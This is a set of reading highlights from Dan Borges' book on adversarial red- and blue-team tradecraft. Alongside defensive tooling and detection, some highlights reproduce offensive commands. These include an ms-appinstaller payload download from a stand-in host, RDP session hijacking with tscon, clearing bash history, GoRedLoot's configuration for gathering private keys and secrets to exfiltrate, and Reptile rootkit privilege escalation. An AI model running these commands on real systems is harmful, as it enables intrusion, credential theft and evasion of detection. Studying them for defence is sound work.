q# Adversarial Tradecraft in Cybersecurity

## Metadata
- Author: [[Dan Borges]]
- Full Title: Adversarial Tradecraft in Cybersecurity
- Category: #books
## Highlights
- Download the example code files You can download the example code files for this book from: https://github.com/PacktPublishing/Adversarial-Tradecraft-in-Cybersecurity. ([Location 156](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=156))
- Tags: [[pink]]
- These examples of shifting strategies can also be seen on the offensive side, such as migration from the use of PowerShell scripting language as the dominant post-exploitation language to C# and other compiled languages that can still leverage .NET Framework on Windows. Another example is the shift from the criminal activity of cultivating and selling access to botnets to using ransomware on an entire network for a quick, high-gain profit. ([Location 224](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=224))
- Tags: [[pink]]
- Authentication defines how you prove your identity and authorization defines what you can access with that identity. ([Location 247](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=247))
- Tags: [[pink]]
- Cybersecurity is a deeply complex form of a non-cooperative, asymmetric game in which certain strategies can outperform other strategies. ([Location 275](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=275))
- Tags: [[pink]]
- Defense in depth involves layering security controls so that in the eventuality that a single control is breached, the offensive efforts can still be prevented, detected, and responded to by further layers of controls[8] ([Location 293](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=293))
- Tags: [[pink]]
- The cloud is just various virtually hosted and dynamically scaled Linux technologies. ([Location 315](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=315))
- Tags: [[pink]]
- What will unite the offense throughout this book is their use of guile and deception to gain the advantage. ([Location 368](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=368))
- Tags: [[pink]]
- One of the conference talks that best embodies the spirit of this book or the red teams I imagine in this book is Raphael Mudge's Dirty Red Team Tricks[17]. ([Location 372](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=372))
- Tags: [[pink]]
- Such gloves-off techniques may involve using honey pots to catch the attackers, reverse engineering the attacker's tools to find errors or vulnerabilities in them, and even hacking back the attacker's infrastructure to gain more intelligence on their operations. These gloves-off operations will be the majority of what we explore with this book. This means getting the advantage over your opponent, sometimes in an unfair way, and leveraging this advantage to win the game. ([Location 475](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=475))
- Tags: [[pink]]
- Barton Whaley, who studied the element of surprise and deception throughout his career, defined deception as "any information (conveyed by statement, action, or object) intended to manipulate the behavior of others by inducing them to accept a false or distorted perception of reality — their physical, social, or political environment"[22] ([Location 510](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=510))
- Tags: [[pink]]
- In Barton Whaley's Toward a General Theory of Deception, he covers two categories, showing the false and hiding the real. ([Location 523](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=523))
- Tags: [[pink]]
- compromising a user and obtaining root access on their machine. Often, the user will not be security savvy and the offense will have an advantage in this situation, masquerading as the user and gathering more information on the network. ([Location 555](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=555))
- Tags: [[pink]]
- As Mike Tyson aptly put it, "Everyone has a plan until they get punched in the mouth." ([Location 661](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=661))
- Tags: [[pink]]
- Encryption security is often thought of as a function of time in terms of the amount of time until a certain key can be brute-forced. ([Location 713](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=713))
- Tags: [[pink]]
- Sometimes, as a defender you may want to wait and watch the attacker, letting them take action before you contain or evict them to help understand their motives and targets. ([Location 721](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=721))
- Tags: [[pink]]
- These principles, such as deception, physical access, economy, humanity, planning, innovation, and timing, will all be crucial elements in gaining the advantage in a conflict. ([Location 764](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=764))
- Tags: [[pink]]
- As Eisenhower said, "The plan is useless, but planning is essential." ([Location 863](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=863))
- Tags: [[pink]]
- One of my favorite free resources for low-level technical skills is https://opensecuritytraining.info/, which includes over 23 high-quality courses, many with videos[7]. ([Location 966](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=966))
- Tags: [[pink]]
- have heard defense referred to as a series of web building, analogous to a spider building its web. Following this analogy, the net must be wide enough to cover all of the space they are tasked with protecting, but also flexible enough to alert them when the net has caught something. ([Location 1036](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1036))
- Tags: [[pink]]
- Security collectors or agents are typically used to generate data from active infrastructure. I've always bucketed digital security collection into three categories: network-based telemetry, host-based telemetry, and application-specific or log-based telemetry. ([Location 1054](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1054))
- Tags: [[pink]]
- There are tons of examples within the Awesome Honeypots GitHub repository (https://github.com/paralax/awesome-honeypots), ([Location 1171](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1171))
- Tags: [[pink]]
- An open-source alternative to Splunk is HELK[26], which is a free option providing similar functionality for those on a budget. HELK is a combination of many open-source logging technologies such as ELK, Elasticsearch, Logstash, and Kibana, ([Location 1198](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1198))
- Tags: [[pink]]
- ElastAlert can then send operators emails when they trigger on a known alert, and the alert triage flow can be handled in TheHive[34]. By using TheHive we can integrate our alerts into other standalone services we may have, including integration to Cortex, allowing us to take actions directly from alerts. Using TheHive, with Cortex enrichment from the rest of our infrastructure, will be a powerful ([Location 1241](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1241))
- Tags: [[pink]]
- An incredible example of the principle of innovation is the CCDC team representing the University of Virginia's (UVA) development of a tool called BLUESPAWN[45]. ([Location 1327](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1327))
- Tags: [[pink]]
- If you're looking at Cuckoo, you may consider the GitHub project BoomBox, which will spin up a full Cuckoo deployment in a few simple commands[50]. ([Location 1348](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1348))
- Tags: [[pink]]
- Services such as VirusTotal[52], Joe Sandbox[53], Anyrun[54], and HybridAnalysis[55] can give a massive boost in analysis capabilities against a particular piece of malware, but also come with the drawback of using a public service. ([Location 1352](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1352))
- Tags: [[pink]]
- Pure Funky Magic (PFM)[57]. PFM contains many common utilities that analysts would use but via a central location to access and share transformations. Similarly, Maltego or other mind-mapping services can be excellent for sharing intelligence or data about threats or targets among team members[58]. ([Location 1361](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1361))
- Tags: [[pink]]
- you want to play around with some of the technologies I've mentioned, I highly recommend checking out Security Onion 2[59]. This is an evolution of the very popular Security Onion, refactored with many of the tools we've already mentioned in this chapter. ([Location 1374](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1374))
- Tags: [[pink]]
- On the National CCDC red team, we use ephemeral Docker instances that will change IP addresses between every scan and send us consolidated scan reports. One really helpful thing is diff'ing scan results over time, to observe what changed in a network posture between two points in time. ([Location 1412](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1412))
- Tags: [[pink]]
- These vulnerability scanners, tools such as nmap-vulners[65], OpenVas[66], or Metasploit[67], allow attackers to find exploitable software from among that which they've already discovered. ([Location 1416](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1416))
- Tags: [[pink]]
- alias turbonmap='nmap -sS -Pn --host-timeout=1m --max-rtt-timeout=600ms --initial-rtt-timeout=300ms --min-rtt-timeout=300ms --stats-every 10s --top-ports 500 --min-rate 1000 --max-retries 0 -n -T5 --min-hostgroup 255 -oA fast_scan_output -iL' $ turbonmap 192.168.0.1/24 The preceding Nmap scan is highly aggressive and loud on the network. ([Location 1435](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1435))
- Tags: [[pink]]
- ways to speed up large Nmap scans[76]. The purpose of this automation is to show how easy it is to chain simple tools together with a little bash scripting: $ sudo masscan 192.168.0.1/24 -oG initial.gnmap -p 7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157 --rate 10000 $ egrep '^Host: ' initial.gnmap | cut -d" " -f2 | sort | uniq > alive.hosts $ nmap -Pn -n -T4 --host-timeout=5m --max-retries 0 -sV -iL alive.hosts -oA nmap-version-scan ([Location 1446](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1446))
- Tags: [[pink]]
- Garble will further help protect our payloads by removing build information, replacing package names, and stripping symbol tables; steps that help obfuscate by further hiding the real. ([Location 1481](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1481))
- Tags: [[pink]]
- To help planners navigate the various features of open-source C2 frameworks you may consider browsing The C2 Matrix, a collection of many modern public C2 frameworks[82] ([Location 1504](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1504))
- Tags: [[pink]]
- It's a popular strategy to make one of these implants an operational implant and the other a form of long-term persistence, which can spawn more operational implants in the event you lose an operational session. ([Location 1511](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1511))
- Tags: [[favorite]] [[pink]]
- good example of such a project for managing cracking infrastructure would be CrackLord[84]. ([Location 1519](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1519))
- Tags: [[pink]]
- This will be the first of several reaction correspondences we examine, focusing on process injection techniques, the forensic artifacts that in-memory techniques avoid, and some detection strategies for process injection. This chapter will show you why these strategies developed naturally as a result of this conflict over the last few decades. ([Location 1743](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1743))
- Tags: [[pink]]
- These tools have been around for so long and used in so many forensic response operations that even more tools have been innovated on top of them, to further facilitate traditional forensics. For example, log2timeline and Plaso were invented to help create a timeline of objects as they were written to disk[3]. ([Location 1782](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1782))
- Tags: [[pink]]
- Shellcode is a short name for position-independent assembly language code, ([Location 1824](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1824))
- Tags: [[pink]]
- As we already briefly touched on, there are many different techniques for allocating and running shellcode in a target process just on Windows alone. MITRE, for example, lists more than 11 different sub-techniques under process injection, everything from DLL injection and process doppelganging to process hollowing and thread execution hijacking[7]. ([Location 1827](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1827))
- Tags: [[pink]]
- Hexacorn, who runs a terrific security research blog, lists over 42 different process injection techniques on Windows alone[8]. ([Location 1834](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1834))
- Tags: [[pink]]
- CreateRemoteThread is probably one of the easiest, oldest, and most well-understood process injection techniques[10]. The technique itself requires several prerequisites, such as code already running in a high context, pre-generated position-independent shellcode to be executed, and a target process to execute it in. The technique also requires the SeDebug privilege[11], which is often inherited by the Administrator account. Another important requirement for the majority of implementations is that we must inject shellcode of the same architecture as the target process. For example, we need a 32-bit payload to inject into a 32-bit process, and a 64-bit payload to inject into a 64-bit process. Also, we can only inject into processes within the same context as our current process, so if we want to inject into a SYSTEM process, we need to privilege escalate to SYSTEM first. These limitations often make process injection a post-exploitation technique, meaning we need to be established on the host first. Regardless ([Location 1841](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1841))
- Tags: [[pink]]
- Frameworks like msfvenom add the ability to obfuscate shellcode through various encoding or compression schemes. We can even obfuscate our shellcode on top of basic encoding routines by encrypting our shellcode with a tool such as the Obfuscator[12]. ([Location 1896](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1896))
- Tags: [[pink]]
- If you want an example target to test your exploits on, which you should always do before using them in a competition, I recommend Metasploitable 3 as a vulnerable Windows Server 2008 image: https://github.com/rapid7/metasploitable3. It deploys easily enough with Vagrant on Virtual Box, although you will need to open up firewall ports so that you can access SMB and use the eternal blue exploit. ([Location 1939](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1939))
- Tags: [[pink]]
- This has since been replaced in Sliver with the Garble obfuscation framework[20], which will strip build info, filenames, replace package paths, obfuscate literals, and remove excess information[21]. ([Location 1979](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1979))
- Tags: [[pink]]
- Granted, these tools may still be able to detect the injected processes based on their anomalous behavior, which is still very effective. For example, if the defenders had EDR agents such as Wazuh or OSQuery, they could potentially catch the suspicious process making network connections to the attacker's servers[24]. ([Location 2069](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2069))
- Tags: [[pink]]
- You can use PE-sieve to scan a single process or you can use Hasherezade's automated version, hollows_hunter, to quickly scan the whole system with PE-sieve's capabilities[36]. ([Location 2132](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2132))
- Tags: [[pink]]
- > ./BLUESPAWN-client.exe --hunt -a Normal --hunts=T1055 --react=carve-memory,suspend --log=console,xml ([Location 2144](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2144))
- Tags: [[pink]]
- Sysmon needs a policy to configure it; thankfully, SwiftOnSecurity provides an amazing base policy that is really well commented, so you can see how it is configured to alert[40]. For example, the SwiftOnSecurity policy excludes a bunch of known good services and processes, as well as excluding localhost network connections, alerting considerations that will reduce a lot of false positives. ([Location 2170](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2170))
- Tags: [[pink]]
- We can also use a Sysmon policy to catch specific API calls, events, and access that are commonly used in certain process injection techniques, such as with Olaf Hardtong's include_process_suspend_resume rule[41]. We can load Olaf's full policy as well, which includes detections for a large number of techniques, all mapped to MITRE ATT&CK[42]. ([Location 2175](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2175))
- Tags: [[pink]]
- When we detect this process injection technique in memory, we can dump the associated byte array. If they are using .NET or managed code, we can decompile it, getting back source code that is more easily read than the assembly or machine code. Injected .NET assemblies specifically are simple to decompile directly from memory (you can use a tool such as dnSpy: https://reverseengineering.stackexchange.com/a/13784) once you locate the injected bytes. ([Location 2182](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2182))
- Tags: [[pink]]
- When we look at the assembly or byte code of a compiled program, this is often referred to as disassembly, but when we can reverse the program into a higher-level language that is interpreted at runtime, this is called decompiling. ([Location 2185](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2185))
- Tags: [[blue]]
- The windows list is maintained at https://github.com/api0cradle/LOLBAS and is organized by file type, such as executable, script, or library. The Unix list is maintained at https://gtfobins.github.io/ and can be sorted via functionality, which makes it extremely useful for finding privilege escalation bugs. ([Location 2373](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2373))
- Tags: [[blue]]
- start ms-appinstaller://?source=https://example.com/bad.exe && timeout 1 && taskkill /f /IM AppInstaller.exe > NUL > attrib -h -r -s /s /d %LOCALAPPDATA%\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\* ([Location 2401](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2401))
- Tags: [[blue]]
- The sections of a PE are also well-known structures such as executable code (.text), info data (.data, .rdata, .bss), resources (.rsrc), exported functions (.edata), imported functions (.idata), and debug info (.debug). ([Location 2429](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2429))
- Tags: [[blue]]
- That said, this tool will be useful for us as we can now infect a known system binary and unless the defense looks closely enough, it will appear as a legitimate file. Fortunately for us, Sliver has implemented the binjection library into their post-exploitation framework. ([Location 2444](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2444))
- Tags: [[blue]]
- You will still need tools to parse DNS debug logs quickly, there are some older scripts and tools out there to help, such as the Reading-DNS-Debug-Logs.ps1 script from p0wershell.com[25]. ([Location 2624](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2624))
- Tags: [[blue]]
- individually. If you want a simple list of all of the domain names your client has queried, you can use the following one-liner: > Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=22} | ForEach-Object {$_.message -split "`r`n"} | Select-String QueryName | %{$_.line.split()[-1]} ([Location 2652](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2652))
- Tags: [[blue]]
- Get-SysmonLogs by 0DaySimpson[26]. This PowerShell module is very handy as it lets us manipulate the logs as PowerShell objects rather than splitting every line and searching. For example, we can query a limited set of logs and select specific information from the objects we get back, using this module: > Get-SysmonLogs -DNS -Count 5 | ForEach-Object { $_.QueryName } ([Location 2659](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2659))
- Tags: [[blue]]
- That said, Autoruns won't get everything on Windows. There is a lot of hidden and esoteric functionality on Windows that allows for execution persistence. Hexicorn continues to be a great source of computer security documentation, including a series of over 130 entries documenting different persistence mechanisms[32]. ([Location 2714](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2714))
- Tags: [[blue]]
- For competitions, I like using TrustedSec's Artillery, which is a Python server that listens on several common ports[41]. It works by waiting for a full TCP connection to these ports, then banning IP addresses via IPTables for things that make TCP connections to its ports. ([Location 2793](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2793))
- Tags: [[blue]]
- The problem with most honeypots is that they are too obviously vulnerable. If something has multiple exploitable services and several blatant misconfigurations, you tend to question why the organization hasn't found this vulnerable service yet. If the entire environment is full of vulnerabilities, it might make sense, but if the environment is highly locked down and there is one super vulnerable host, then it tends to look like a trap. ([Location 2798](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2798))
- Tags: [[blue]]
- Because the event log can be such a complex file format, we can learn from the fantastic project Eventlogedit by 3gstudent to understand several of these techniques from an offensive perspective[2] ([Location 2923](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2923))
- Tags: [[blue]]
- For our actual operations, we will use a more tested and ready-for-production-use version of the technique from QAX-A-Team, EventCleaner[5] ([Location 2941](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2941))
- Tags: [[blue]]
- Trying random techniques on the host where you are unsure if they will work is often referred to as flailing and is not something experienced hackers should engage in. ([Location 2965](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2965))
- Tags: [[blue]]
- Vlad Rico's apache2_BackdoorMod[7]. One drawback to using this tool and technique is that if the defender lists out the loaded modules, they can clearly see the names and module loaded, including our malicious module: $ apache2ctl -t -D DUMP_MODULES Therefore, as an attacker, you will probably want to rename your modules and backdoors to blend in with other existing modules. ([Location 2995](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2995))
- Tags: [[blue]]
- On Windows, such driver-based rootkits require being signed for x64 systems, however it's important to note that driver signing isn't enforced on x86 Windows systems, making them a much easier target for such activities. ([Location 3016](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3016))
- Tags: [[blue]]
- For our example, we will focus on Reptile, one of my favorite LKM rootkits[10]. ([Location 3017](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3017))
- Tags: [[blue]]
- is important to change the default configurations, as with a tool like Reptile there are many obvious locations to check and it will also reveal the tool in use very quickly. ([Location 3029](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3029))
- Tags: [[blue]]
- Reptile is epic because it can even hide its own kernel module by unlinking it from lsmod[15]. Unlike before with the Apache2 modules, this time if we list out the loaded kernel module, we will not see the Reptile module loaded. Reptile can also be used to escalate privileges, in the event we come back as an unprivileged user. To upgrade to a root shell, use the command tool with a root flag: /reptile/reptile_cmd root. When hiding processes, Reptile will hide the entire process tree, so the attacker can shell out from their existing backdoors now. ([Location 3041](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3041))
- Tags: [[blue]]
- classic tool for checking many known locations and for many known rootkits is rkhunter[20], however, by default, this will not detect the Reptile LKM rootkit for whatever reason. Luckily, we can use the Sandfly Security Go tool, processdecloak[21]. Simply running the tool will reveal processes hidden by Reptile. That said, a savvy operator would also notice several crucial files and directories missing once Reptile has been enabled, such as /etc/ and /var/ no longer being in the root directory. Additionally, if you notice a critical directory missing, but can still cd into that location, you probably have a rootkit on your hands. ([Location 3090](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3090))
- Tags: [[blue]]
- By simply installing a tap on both the network and the host, you can verify the host integrity by spotting missing traffic. ([Location 3100](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3100))
- Tags: [[blue]]
- If they are coming in over SSH or another inbound service they have access to, we can drop a random percentage of traffic to hinder and frustrate the attacker: $ sudo iptables -A INPUT -m statistic --mode random --probability 0.7 -s 0/0 -d 0/0 -p tcp --dport 22 -j DROP ([Location 3155](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3155))
- Tags: [[blue]]
- Likewise, if you see the attacker has some form of limited access or a basic outbound connection, such as a reverse shell, you can frustrate them by dropping the outbound packets of this tool. By dropping the response, you can still pick up the intel on the commands they send you but make the shell mostly useless as they wait for responses that will never arrive complete: $ sudo iptables -A OUTPUT -m statistic --mode random --probability 0.7 -s 0/0 -d 0/0 -p tcp --dport 9999 -j DROP ([Location 3159](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3159))
- Tags: [[blue]]
- Remember, when you're done trolling or testing you can drop your firewall rules with iptables (this also works if you want to drop the defender's rules as an attacker): $ sudo iptables -F ([Location 3163](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3163))
- Tags: [[blue]]
- Portspoof isn't a honeypot but instead will show the attackers all ports are open on the target system, and even includes a database to emulate many of these service banners. Rather than reducing port scans to only the available services, the defender will make it appear that all ports are open and running services, ([Location 3168](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3168))
- Tags: [[blue]]
- We can use iptables' tarpit with the following commands. Granted you will need the ports open to begin with, so this tool works very well with Portspoof: $ sudo iptables -A INPUT -p tcp --dport 3306 -j TARPIT ([Location 3198](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3198))
- Tags: [[blue]]
- Seatbelt[2]. Seatbelt can check for many common antivirus applications, any applied AppLocker policies, audit policies, local GPOs, Windows Defender settings, Windows Firewall settings, Sysmon policies, and many more configurations. ([Location 3395](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3395))
- Tags: [[blue]]
- 3]. pspy does this by monitoring changes to the process list, proc filesystem, and other critical filesystem events through the inotify API. ([Location 3404](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3404))
- Tags: [[pink]]
- $ go mod init pspy $ go mod vendor $ go build $ ./pspy ([Location 3409](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3409))
- Tags: [[blue]]
- For example, I always run file and strings on a file in an attempt to understand what it really is before running it. As we saw in previous chapters, you can't trust a file is simply what its name says it is. I also like to run which on any system utilities I may be considering, to make sure they are in the proper location and I can inspect them before running them. Another thing I tend to do early is to check any aliases this user may have, along with the general environment variables, with the command env. ([Location 3416](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3416))
- Tags: [[pink]]
- The command echo * in a Bash shell can be used to list out all available files, even when you can't ls something. One neat trick, if you find a binary has been made read-only, is you can actually use ldd to execute it. The command ldd can be used to load a read-only ELF file into the linker, which subsequently executes it to get the linked libraries[4] ([Location 3422](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3422))
- Tags: [[pink]]
- Disabling Bash history is as simple as unsetting the location of the history file in the shell's environment variables: $ unset HISTFILE And clearing it can be done by calling the history command with the c flag to clear: $ history -c ([Location 3431](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3431))
- Tags: [[pink]]
- If you find yourself in a Docker instance instead of on the native host, you can attempt to break out in several ways. Again, the scope of Docker escapes is way beyond this chapter, but a really good tool for exploring these escapes is called DEEPCE (Docker Enumeration, Escalation of Privileges and Container Escapes)[5]. ([Location 3458](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3458))
- Tags: [[pink]]
- WireTap is really sweet because it will intercept the keyboard, screen, and even microphone information. WireTap is a one-stop-shop for getting operational information on Windows. ([Location 3512](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3512))
- Tags: [[pink]]
- That said, MimiPenguin can be pretty effective if the user is leveraging a common desktop environment on Kali, Debian, Ubuntu, or even Arch Linux. ([Location 3543](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3543))
- Tags: [[pink]]
- We can also use 3snake, to pull passwords from memory, out of sshd directly[19]. This tool is very nice as it's a fairly accurate memory scanner, and SSH is a ubiquitous remote administration protocol on Linux. That said, you will need to run it persistently in the background somewhere, so it's important to hide it appropriately. ([Location 3547](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3547))
- Tags: [[pink]]
- Let's take a quick look at the important configuration variables on lines 21-27 of GoRedLoot: // Keyz is our global list of files to stage for exfil var Keyz []string var encryptPassword = "examplepassword" var ignoreNames = []string{"Keychains", ".vmdk", ".vmem", ".npm", ".vscode", ".dmg", "man1", ".ova", ".iso"} var ignoreContent = []string{"golang.org/x/crypto"} var includeNames = []string{"Cookies"} var includeContent = []string{"BEGIN DSA PRIVATE KEY", "BEGIN RSA PRIVATE KEY", "secret", "key", "pass"} And we can call this tool (or inject it into memory) like so on the victim system: $ ./GoRedLoot /home/ /tmp/initram We can also use similar Windows tools from SharpCollection, such as SharpDir, SharpShare, and SharpFiles[21], if we are looking for a Windows-specific solution. That said, GoRedLoot is cross-platform and I've had great success using it on Windows, Linux, and even macOS. ([Location 3560](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3560))
- Tags: [[pink]]
- In RDP hijacking, you will need system-level permissions, and you can use the system utility tscon to hijack any existing RDP sessions on the system[30]. ([Location 3684](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3684))
- Tags: [[pink]]
- > query user > sc create ses binpath="cmd.exe /k tscon [victim ID] /dest:[your SESSIONNAME]" > net start ses ([Location 3688](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3688))
- Tags: [[pink]]
- On Windows the traditional avenue is abusing Windows Active Directory. Many tools exist for this, such as PowerView, BloodHound, PowerSploit, Impacket, and CrackMapExec just to name a few. ([Location 3698](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3698))
- Tags: [[pink]]
- big part of the defensive considerations here is tipping your hand or signaling to the offense how much you may know. For example, you may not want to upload samples to public repositories like VirusTotal. You also may not want to respond on a host such that you don't let the offense know you can detect their current tooling. For example, you may want to finish scoping the infection, to see what other hosts they have accessed, before cutting their current access and thus tipping your hand. We will cover these concepts of when to respond more in Chapter 8, Clearing the Field, but for now, let's look at some options for when you do decide to expel an attacker. ([Location 3718](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3718))
- Tags: [[pink]]
- Commands like netstat -antp and losf -i ([Location 3730](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3730))
- Tags: [[pink]]
- We can also do this on Windows leveraging the Windows firewall using PowerShell with: > New-NetFirewallRule -DisplayName "AttackerX 1 IP In" -Direction Inbound –LocalPort Any -Protocol TCP -Action Block -RemoteAddress 172.31.33.7 And again blocking reverse connections with something like: > New-NetFirewallRule -DisplayName "AttackerX 1 IP Out" -Direction Outbound –LocalPort Any -Protocol TCP -Action Block -RemoteAddress 172.31.33.7 ([Location 3762](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3762))
- Tags: [[pink]]
- On Windows with local accounts, Microsoft actually provides a really nice script for this, known as Local-PasswordRoll.ps1 (https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30). This script can work remotely with other machines via WinRM, which makes it great for ad hoc administration of many Windows machines, although I've also edited a version you can use to change local passwords without needing WinRM enabled (https://gist.github.com/ahhh/92fc42f9a0c1bcb0d8f42fe52f83f9a3). ([Location 3819](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3819))
- Tags: [[pink]]
- Invoke-PasswordRoll -LocalAccounts @("Administrator", "example_user") -TsVFileName "newpws.tsv" -EncryptionKey "secretvalue" Later, if you want to view the newly set passwords, you can read them out of the encrypted file with the key specified. > ConvertTo-CleartextPassword -EncryptionKey "secretvalue" -EncryptedPassword 76492d1116743f0423413b16050a5345MgB8ADQANA B4AEcATwBkAGYATQA4AFQAWgBZAEsAOQBrAGYANQBpADMAOQBwAFEAPQA9AH wANwBjADEAZgA2ADgAMAAwADIAOAAxAGUANgBlADQAOQA2ADQAYwBkADUAYw BhADIANgA1ADgANwA5AGQAYwA4ADAAYgBiAGUAZgBhADkANwBlADMANwA2AD MAMQA3AGMAZQAyADIAZgA4ADMANwBiAGQANwA3ADcAYwAwADQAZgAyAGUANA AxAGEAZQA1ADcAYgAxADYAMABkADMAZABjADgAZQBhAGQAZgAyADIAZQBjAD EAYgAwADkAZgA4AGMA ([Location 3828](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3828))
- Tags: [[pink]]
- In fact, there are entire toolsets designed for bypassing chroot, such as chw00t[36]. ([Location 3862](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3862))
- Tags: [[pink]]
- One idea in looking for user abuse or trapping attacker persistence is setting up skeleton templates for new users. As we saw in previous chapters, attackers will very often create new accounts on a system as a way to get back in. By applying default controls to new users, we can catch these simple persistence techniques with our own counter-techniques. skel works by applying anything in /etc/skel/ to all new users created. So we can give them things like a custom .bash_profile or .bashrc in their home directory before they ever log in. For example, we can change the default location of their history file, such that an attacker may not notice their bash_history is being recorded. Further, we can add timestamps to the history file to make it a little better for forensic analysis: # echo 'HISTFILE=/var/log/user_history' >> /etc/skel/.bashrc # echo 'HISTTIMEFORMAT""%d/%m/%y %""' >> /etc/skel/.bashrc Another thing you can do, if you know a specific account is being abused, is change that account's default login shell to an alert program you control or something like rootsh, the shell keylogger we saw earlier. rootsh is a shell wrapper that will collect all information entered into the session, making it just as valuable for defensive teams as for the offense. To change a user's default shell, edit the /etc/password as we saw in the previous section with the offense. ([Location 3891](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3891))
- Tags: [[pink]]
